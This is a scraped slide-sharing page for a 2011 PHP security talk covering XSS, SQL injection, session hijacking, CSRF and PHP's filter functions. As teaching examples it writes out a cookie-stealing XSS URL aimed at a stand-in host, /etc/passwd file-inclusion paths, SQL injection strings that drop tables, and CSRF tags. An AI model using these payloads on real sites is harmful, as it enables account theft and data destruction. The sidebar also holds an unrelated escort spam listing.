Submit Search
Upload
SydPHP Security in PHP
•
Download as PPTX, PDF
•
3 likes
•
2,086 views
Allan Shone
Follow
Security in PHP talk for SydPHP, Thursday 24th February, 2011
Read less
Read more
Technology
Report
Share
Report
Share
1 of 39
Download now
Recommended
The problem with passwords on the web and what to do about it
The problem with passwords on the web and what to do about it
Francois Marier
obtain additional security
obtain additional security
offbeatnominee633
Common hacking practices
Common hacking practices
Marian Marinov
Cyber Security 101 – A Practical Guide for Small Businesses
Cyber Security 101 – A Practical Guide for Small Businesses
PECB
B-sides Las Vegas - social network security
B-sides Las Vegas - social network security
Damon Cortesi
Facebook Password Sniper
Facebook Password Sniper
eagerdemography62
Death To Passwords
Death To Passwords
DroidConTLV
Owasp top 10 web application security hazards - Part 1
Owasp top 10 web application security hazards - Part 1
Abhinav Sejpal
Recommended
The problem with passwords on the web and what to do about it
The problem with passwords on the web and what to do about it
Francois Marier
obtain additional security
obtain additional security
offbeatnominee633
Common hacking practices
Common hacking practices
Marian Marinov
Cyber Security 101 – A Practical Guide for Small Businesses
Cyber Security 101 – A Practical Guide for Small Businesses
PECB
B-sides Las Vegas - social network security
B-sides Las Vegas - social network security
Damon Cortesi
Facebook Password Sniper
Facebook Password Sniper
eagerdemography62
Death To Passwords
Death To Passwords
DroidConTLV
Owasp top 10 web application security hazards - Part 1
Owasp top 10 web application security hazards - Part 1
Abhinav Sejpal
Death To Passwords Droid Edition
Death To Passwords Droid Edition
PayPal
Death To Passwords
Death To Passwords
Tim Messerschmidt
JavaScript Is Everywhere [Infographic]
JavaScript Is Everywhere [Infographic]
Catarina Cardoso
Preparing for the Internet Zombie Apocalypse
Preparing for the Internet Zombie Apocalypse
Pantheon
Roberto Bicchierai - Defending web applications from attacks
Roberto Bicchierai - Defending web applications from attacks
Pietro Polsinelli
Owasp top 10 web application security hazards part 2
Owasp top 10 web application security hazards part 2
Abhinav Sejpal
Make profit with UI-Redressing attacks.
Make profit with UI-Redressing attacks.
n|u - The Open Security Community
Hacking 101 (Session 2)
Hacking 101 (Session 2)
Nitroxis Sprl
Web application vulnerabilities
Web application vulnerabilities
ebusinessmantra
Hacking 101 (Henallux, Owasp Top 10, WebGoat, Live Demo)
Hacking 101 (Henallux, Owasp Top 10, WebGoat, Live Demo)
Nitroxis Sprl
Cybercrime - Why we're not doomed after all
Cybercrime - Why we're not doomed after all
Sophos Benelux
Web Application Security - "In theory and practice"
Web Application Security - "In theory and practice"
Jeremiah Grossman
Hacking 101 3
Hacking 101 3
Nitroxis Sprl
Secure input and output handling - Magento Meetup Vienna Edition
Secure input and output handling - Magento Meetup Vienna Edition
Anna Völkl
Delete fb downloader search
Delete fb downloader search
christaldisouza1
Secure input and output handling - ViennaPHP
Secure input and output handling - ViennaPHP
Anna Völkl
CSS3 and jQuery
CSS3 and jQuery
psophy
jQuery: Events, Animation, Ajax
jQuery: Events, Animation, Ajax
Constantin Titarenko
PHP Security Tips
PHP Security Tips
Chris Tankersley
Your Inner Sysadmin - Tutorial (SunshinePHP 2015)
Your Inner Sysadmin - Tutorial (SunshinePHP 2015)
Chris Tankersley
HTML5 & WAI-ARIA Forms with jQuery Validation
HTML5 & WAI-ARIA Forms with jQuery Validation
pauljadam
OWASP App Sec US - 2010
OWASP App Sec US - 2010
Aditya K Sood
More Related Content
What's hot
Death To Passwords Droid Edition
Death To Passwords Droid Edition
PayPal
Death To Passwords
Death To Passwords
Tim Messerschmidt
JavaScript Is Everywhere [Infographic]
JavaScript Is Everywhere [Infographic]
Catarina Cardoso
Preparing for the Internet Zombie Apocalypse
Preparing for the Internet Zombie Apocalypse
Pantheon
Roberto Bicchierai - Defending web applications from attacks
Roberto Bicchierai - Defending web applications from attacks
Pietro Polsinelli
Owasp top 10 web application security hazards part 2
Owasp top 10 web application security hazards part 2
Abhinav Sejpal
Make profit with UI-Redressing attacks.
Make profit with UI-Redressing attacks.
n|u - The Open Security Community
Hacking 101 (Session 2)
Hacking 101 (Session 2)
Nitroxis Sprl
Web application vulnerabilities
Web application vulnerabilities
ebusinessmantra
Hacking 101 (Henallux, Owasp Top 10, WebGoat, Live Demo)
Hacking 101 (Henallux, Owasp Top 10, WebGoat, Live Demo)
Nitroxis Sprl
Cybercrime - Why we're not doomed after all
Cybercrime - Why we're not doomed after all
Sophos Benelux
Web Application Security - "In theory and practice"
Web Application Security - "In theory and practice"
Jeremiah Grossman
Hacking 101 3
Hacking 101 3
Nitroxis Sprl
Secure input and output handling - Magento Meetup Vienna Edition
Secure input and output handling - Magento Meetup Vienna Edition
Anna Völkl
Delete fb downloader search
Delete fb downloader search
christaldisouza1
Secure input and output handling - ViennaPHP
Secure input and output handling - ViennaPHP
Anna Völkl
What's hot
(16)
Death To Passwords Droid Edition
Death To Passwords Droid Edition
Death To Passwords
Death To Passwords
JavaScript Is Everywhere [Infographic]
JavaScript Is Everywhere [Infographic]
Preparing for the Internet Zombie Apocalypse
Preparing for the Internet Zombie Apocalypse
Roberto Bicchierai - Defending web applications from attacks
Roberto Bicchierai - Defending web applications from attacks
Owasp top 10 web application security hazards part 2
Owasp top 10 web application security hazards part 2
Make profit with UI-Redressing attacks.
Make profit with UI-Redressing attacks.
Hacking 101 (Session 2)
Hacking 101 (Session 2)
Web application vulnerabilities
Web application vulnerabilities
Hacking 101 (Henallux, Owasp Top 10, WebGoat, Live Demo)
Hacking 101 (Henallux, Owasp Top 10, WebGoat, Live Demo)
Cybercrime - Why we're not doomed after all
Cybercrime - Why we're not doomed after all
Web Application Security - "In theory and practice"
Web Application Security - "In theory and practice"
Hacking 101 3
Hacking 101 3
Secure input and output handling - Magento Meetup Vienna Edition
Secure input and output handling - Magento Meetup Vienna Edition
Delete fb downloader search
Delete fb downloader search
Secure input and output handling - ViennaPHP
Secure input and output handling - ViennaPHP
Viewers also liked
CSS3 and jQuery
CSS3 and jQuery
psophy
jQuery: Events, Animation, Ajax
jQuery: Events, Animation, Ajax
Constantin Titarenko
PHP Security Tips
PHP Security Tips
Chris Tankersley
Your Inner Sysadmin - Tutorial (SunshinePHP 2015)
Your Inner Sysadmin - Tutorial (SunshinePHP 2015)
Chris Tankersley
HTML5 & WAI-ARIA Forms with jQuery Validation
HTML5 & WAI-ARIA Forms with jQuery Validation
pauljadam
OWASP App Sec US - 2010
OWASP App Sec US - 2010
Aditya K Sood
Anatomy of Fraud (2010 & 2013)
Anatomy of Fraud (2010 & 2013)
Jerry Ocampo
Cinematic UX Design
Cinematic UX Design
Dave Kelleher
jQuery Plugins Intro
jQuery Plugins Intro
Casey West
Cross platform php
Cross platform php
Elizabeth Smith
Safety LAMP: data security & agile languages
Safety LAMP: data security & agile languages
PostgreSQL Experts, Inc.
LAMP Management with Virtualmin
LAMP Management with Virtualmin
Joe Ferguson
Scalable Internet Servers and Load Balancing
Scalable Internet Servers and Load Balancing
Information Technology
Web Technology – Web Server Setup : Chris Uriarte
Web Technology – Web Server Setup : Chris Uriarte
webhostingguy
Effective communication
Effective communication
hussulinux
Zero to Hero, a jQuery Primer
Zero to Hero, a jQuery Primer
Matthew Buchanan
Quick & Easy Dev Environments with Vagrant
Quick & Easy Dev Environments with Vagrant
Joe Ferguson
Apache Web Server Setup 2
Apache Web Server Setup 2
Information Technology
Using unicode with php
Using unicode with php
Elizabeth Smith
Remote security with Red Hat Enterprise Linux
Remote security with Red Hat Enterprise Linux
Giuseppe Paterno'
Viewers also liked
(20)
CSS3 and jQuery
CSS3 and jQuery
jQuery: Events, Animation, Ajax
jQuery: Events, Animation, Ajax
PHP Security Tips
PHP Security Tips
Your Inner Sysadmin - Tutorial (SunshinePHP 2015)
Your Inner Sysadmin - Tutorial (SunshinePHP 2015)
HTML5 & WAI-ARIA Forms with jQuery Validation
HTML5 & WAI-ARIA Forms with jQuery Validation
OWASP App Sec US - 2010
OWASP App Sec US - 2010
Anatomy of Fraud (2010 & 2013)
Anatomy of Fraud (2010 & 2013)
Cinematic UX Design
Cinematic UX Design
jQuery Plugins Intro
jQuery Plugins Intro
Cross platform php
Cross platform php
Safety LAMP: data security & agile languages
Safety LAMP: data security & agile languages
LAMP Management with Virtualmin
LAMP Management with Virtualmin
Scalable Internet Servers and Load Balancing
Scalable Internet Servers and Load Balancing
Web Technology – Web Server Setup : Chris Uriarte
Web Technology – Web Server Setup : Chris Uriarte
Effective communication
Effective communication
Zero to Hero, a jQuery Primer
Zero to Hero, a jQuery Primer
Quick & Easy Dev Environments with Vagrant
Quick & Easy Dev Environments with Vagrant
Apache Web Server Setup 2
Apache Web Server Setup 2
Using unicode with php
Using unicode with php
Remote security with Red Hat Enterprise Linux
Remote security with Red Hat Enterprise Linux
Similar to SydPHP Security in PHP
Avoiding Cross Site Scripting - Not as easy as you might think
Avoiding Cross Site Scripting - Not as easy as you might think
Erlend Oftedal
Securing Java EE Web Apps
Securing Java EE Web Apps
Frank Kim
Web Attacks - Top threats - 2010
Web Attacks - Top threats - 2010
Shreeraj Shah
Building Web Hack Interfaces
Building Web Hack Interfaces
Christian Heilmann
Penetration testing web application web application (in) security
Penetration testing web application web application (in) security
Nahidul Kibria
Web Application Penetration Testing Introduction
Web Application Penetration Testing Introduction
gbud7
Starwest 2008
Starwest 2008
Caleb Sima
CodeIgniter i18n Security Flaw
CodeIgniter i18n Security Flaw
Abbas Naderi
Security Tech Talk
Security Tech Talk
Mallikarjun Reddy
PHPUG Presentation
PHPUG Presentation
Damon Cortesi
Top 7 Skills PHP Developer Must Have
Top 7 Skills PHP Developer Must Have
IndumathySK
Mitigating Malware Presentation Jkd 11 10 08 Aitp
Mitigating Malware Presentation Jkd 11 10 08 Aitp
Joann Davis
Getting More Traffic From Search Advanced Seo For Developers Presentation
Getting More Traffic From Search Advanced Seo For Developers Presentation
Seo Indonesia
A little bit about code injection in WebApplication Frameworks (CVE-2018-1466...
A little bit about code injection in WebApplication Frameworks (CVE-2018-1466...
ufpb
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Brian Huff
OWASP Top 10 And Insecure Software Root Causes
OWASP Top 10 And Insecure Software Root Causes
Marco Morana
Creating Yahoo Mobile Widgets
Creating Yahoo Mobile Widgets
Ricardo Varela
Web API Security
Web API Security
Stefaan
Web Application Security
Web Application Security
Siarhei Barysiuk
Worry Free Web Development
Worry Free Web Development
Ara Pehlivanian
Similar to SydPHP Security in PHP
(20)
Avoiding Cross Site Scripting - Not as easy as you might think
Avoiding Cross Site Scripting - Not as easy as you might think
Securing Java EE Web Apps
Securing Java EE Web Apps
Web Attacks - Top threats - 2010
Web Attacks - Top threats - 2010
Building Web Hack Interfaces
Building Web Hack Interfaces
Penetration testing web application web application (in) security
Penetration testing web application web application (in) security
Web Application Penetration Testing Introduction
Web Application Penetration Testing Introduction
Starwest 2008
Starwest 2008
CodeIgniter i18n Security Flaw
CodeIgniter i18n Security Flaw
Security Tech Talk
Security Tech Talk
PHPUG Presentation
PHPUG Presentation
Top 7 Skills PHP Developer Must Have
Top 7 Skills PHP Developer Must Have
Mitigating Malware Presentation Jkd 11 10 08 Aitp
Mitigating Malware Presentation Jkd 11 10 08 Aitp
Getting More Traffic From Search Advanced Seo For Developers Presentation
Getting More Traffic From Search Advanced Seo For Developers Presentation
A little bit about code injection in WebApplication Frameworks (CVE-2018-1466...
A little bit about code injection in WebApplication Frameworks (CVE-2018-1466...
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)
OWASP Top 10 And Insecure Software Root Causes
OWASP Top 10 And Insecure Software Root Causes
Creating Yahoo Mobile Widgets
Creating Yahoo Mobile Widgets
Web API Security
Web API Security
Web Application Security
Web Application Security
Worry Free Web Development
Worry Free Web Development
Recently uploaded
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
Fwdays
Artificial intelligence in the post-deep learning era
Artificial intelligence in the post-deep learning era
Deakin University
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial Buildings
Memoori
Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project Setup
Florian Wilhelm
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024
Scott Keck-Warren
SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024
Scott Keck-Warren
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Patryk Bandurski
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR Systems
Mark Billinghurst
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
BookNet Canada
Hot Sexy call girls in Panjabi Bagh 🔝 9953056974 🔝 Delhi escort Service
Hot Sexy call girls in Panjabi Bagh 🔝 9953056974 🔝 Delhi escort Service
9953056974 Low Rate Call Girls In Saket, Delhi NCR
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?
Mattias Andersson
Unlocking the Potential of the Cloud for IBM Power Systems
Unlocking the Potential of the Cloud for IBM Power Systems
Precisely
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
Fwdays
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck Presentation
Slibray Presentation
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen Frames
Sinan KOZAK
Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024
Enterprise Knowledge
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
carlostorres15106
Bluetooth Controlled Car with Arduino.pdf
Bluetooth Controlled Car with Arduino.pdf
ngoud9212
The transition to renewables in India.pdf
The transition to renewables in India.pdf
Competition Advisory Services (India) LLP
Snow Chain-Integrated Tire for a Safe Drive on Winter Roads
Snow Chain-Integrated Tire for a Safe Drive on Winter Roads
Hyundai Motor Group
Recently uploaded
(20)
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
Artificial intelligence in the post-deep learning era
Artificial intelligence in the post-deep learning era
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial Buildings
Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project Setup
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024
SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR Systems
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Hot Sexy call girls in Panjabi Bagh 🔝 9953056974 🔝 Delhi escort Service
Hot Sexy call girls in Panjabi Bagh 🔝 9953056974 🔝 Delhi escort Service
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?
Unlocking the Potential of the Cloud for IBM Power Systems
Unlocking the Potential of the Cloud for IBM Power Systems
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck Presentation
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen Frames
Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Bluetooth Controlled Car with Arduino.pdf
Bluetooth Controlled Car with Arduino.pdf
The transition to renewables in India.pdf
The transition to renewables in India.pdf
Snow Chain-Integrated Tire for a Safe Drive on Winter Roads
Snow Chain-Integrated Tire for a Safe Drive on Winter Roads
SydPHP Security in PHP
1.
Security and PHP
February 2011
2.
Allan Shone Technical
Yahoo!, Local Paranoid @Yahoo!7 Been at Yahoo!7 just under 3 years allan.shone@yahoo.com
3.
Website Security February
2011
4.
What is Security?
Why is Security important? What can you do about it?
5.
Types of issues
XSS SQL Injection Session Hijacking CSRF Phishing
6.
Why XSS? February
2011
7.
Lead to larger
problems Used to inject code into your site Bad people ™ can steal user information
8.
http://sydphp.leetbix.com/template.php?load=%3Cscript%3Ealert%280%29;%3C/script%3E http://sydphp.leetbix.com/template.php?load=%3Cscript%3Edocument.location=%27http://badsite.com%27%3C/script%3E http://sydphp.leetbix.com/template.php?load=%3Cscript%3Ea%3Ddocument.createElement(%22img%22)%3Ba.src%3D%22http%3A%2F%2Fbadsite.com%2F%3F%22%2Bdocument.cookie%3Bdocument.firstChild.appendChild(a)%3B%3C%2Fscript%3E
February 2011
9.
February 2011
10.
http://sydphp.leetbix.com/template.php?load=/etc/passwd%00 http://sydphp.leetbix.com/template.php?load=../some-config.conf%00 February
2011
11.
POST too February
2011
12.
What do I
do?! February 2011
13.
Filter Simplest solution:
htmlentities() February 2011
14.
SQL what? February
2011
15.
Arbitrary SQL code
being executed Bypass login, edit database content Find passwords, hidden information
16.
http://sydphp.leetbix.com/login.php Password: ‘
OR 1=1 -- ‘ ‘ OR 1=1; DROP TABLE users; -- ‘ ‘ OR 1=1; UPDATE TABLE users SET password=‘’ WHERE 1=1; -- ‘ February 2011
17.
Oh no! February
2011
18.
http://xkcd.com/327/ February 2011
19.
escape February 2011
20.
mysql_real_escape_string() addslashes() PDO
PDO::quote()
21.
Session hijacking February
2011
22.
Bad for users
Bad for data integrity Easy to prevent
23.
Not stand-alone February
2011
24.
Cookies February 2011
25.
Integrity checking February
2011
26.
CSRF? Sugar? February
2011
27.
Cross-site request forgery
February 2011
28.
Simple, but un-common
February 2011
29.
<imgsrc=“http://othersite.com/changepasswd?new=onlyIKnow” /> <script>
a=document.createElement(‘img’);a.src=‘http://badsite../’;document.firstChild.appendChild(a); a.src=‘http://badsite.com/otherpage’; </script> February 2011
30.
Integrity, integrity February
2011
31.
Phishing! February 2011
32.
Same, but different?
February 2011
33.
But what can
you do February 2011
34.
PHP’s filter functions
February 2011
35.
filter_has_var filter_id filter_input_array
filter_input filter_list filter_var_array filter_var
36.
No more SuperGlobals
February 2011
37.
$search = filter_input(INPUT_GET, 'search', FILTER_SANITIZE_SPECIAL_CHARS);
echo ”<h3>No results found for ‘{$search}’.</h3>"; echo "<a href='?search=$search&page=2'>Next page</a>"; February 2011
38.
INPUT_GET INPUT_POST INPUT_COOKIE
INPUT_SERVER INPUT_ENV February 2011
39.
Twitter Allan
Shone - @cerealboy Jared Mooring - @jadzor Filter function filters: http://au2.php.net/manual/en/filter.filters.php February 2011
Download now